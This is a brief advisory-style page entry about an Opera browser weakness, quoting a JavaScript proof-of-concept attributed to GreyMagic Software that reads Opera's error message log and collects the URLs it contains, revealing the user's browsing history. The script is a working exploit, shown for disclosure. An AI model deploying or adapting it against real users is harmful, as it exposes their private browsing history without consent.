|
Opera Error Message History Disclosure Weakness
The following proof of concept exploit was provided by GreyMagic Software: var sMsg, sFinal="", iLen=opera.errorIndex(); for (var iErr=0;iErr<iLen;iErr++) { sMsg=opera.errorMessage(iErr); if (sMsg && /(https?:\/\/\S+)/i.test(sMsg)) sFinal+=RegExp.$1+"\n"; } alert(sFinal); |
|
|
Privacy Statement |
